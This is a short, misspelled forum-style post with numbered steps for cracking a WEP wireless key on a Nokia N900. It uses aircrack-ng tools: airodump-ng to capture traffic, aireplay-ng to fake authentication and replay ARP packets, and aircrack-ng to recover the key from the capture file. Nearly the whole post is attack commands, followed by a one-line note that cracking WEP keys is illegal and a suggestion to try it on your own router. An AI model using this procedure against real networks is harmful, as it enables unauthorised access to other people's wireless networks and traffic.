hi this will work only if a client is conected on the network. your bluethoot must be off 1- nokia n900 with prm 1.2 2-update your krenel to power krenel from dl sistem ( reboot ) 2-instll aircrack-ng 3-install rootsh 4- oper xterminal type root and enter 5-airodump-ng wlan0 ( put on a paper bssid, station and chanel ) when you have this presc ctr+c 6-in the same window airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name] 7-open a new xterminal windo type root and enter 8-aireplay-ng -1 0 -a [bssid] [wireless card name] 9-open the 3 rd windo type root and enter aireplay-ng -3 -b [bssid] [wireless card name] 10- go on window 1 and wait til you got 50.000 data pack 11-when you have 50.000 data pack prec ctr+c ( in all windows) 12-go on 3 rd window and type cd /root ls and now looke for a file with .cap (ezxtention .cap) 13-aircrack-ng [filename].cap and you will have your wep key 14- if you need space in root delete the.cap files. cd /root rm (name of the file) example rm wep-01.cap please note that is ilegale to crack wep keys ( play wit your roouter ) let me know if you manage to do it.